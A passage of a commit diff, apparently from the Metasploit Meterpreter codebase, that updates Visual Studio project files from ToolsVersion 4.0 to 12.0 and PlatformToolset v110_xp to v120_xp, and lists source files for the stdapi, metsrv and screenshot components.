<ClCompile Include="..\..\source\extensions\stdapi\server\sys\process\process.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\sys\process\image.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\sys\process\in-mem-exe.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\sys\process\memory.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\sys\process\process.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\sys\process\ps.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\sys\process\thread.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\sys\process\util.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\sys\registry\registry.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\sys\power\power.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\sys\eventlog\eventlog.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\sys\config\config.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\sys\process\thread.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\sys\process\util.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\sys\registry\registry.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\sys\power\power.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\sys\eventlog\eventlog.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\sys\config\config.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\ui\desktop.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\ui\idle.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\ui\keyboard.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\ui\mouse.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\ui\ui.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\ui\idle.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\ui\keyboard.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\ui\mouse.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\ui\ui.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\railgun\railgun.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\webcam\audio.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\webcam\bmp2jpeg.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\webcam\webcam.cpp"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\webcam\audio.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\webcam\bmp2jpeg.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\webcam\webcam.cpp" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="..\..\source\extensions\stdapi\server\resource\stdapi.rc"/>
<ResourceCompile Include="..\..\source\extensions\stdapi\server\resource\stdapi.rc" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="..\..\source\extensions\stdapi\server\precomp.h" />
@ -688,4 +689,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
</Project>

20
c/meterpreter/workspace/metsrv/metsrv.vcxproj

@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
@ -43,49 +43,49 @@
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
@ -680,4 +680,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
</Project>

20
c/meterpreter/workspace/screenshot/screenshot.vcxproj

@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
@ -44,45 +44,45 @@
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
@ -439,4 +439,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
</Project>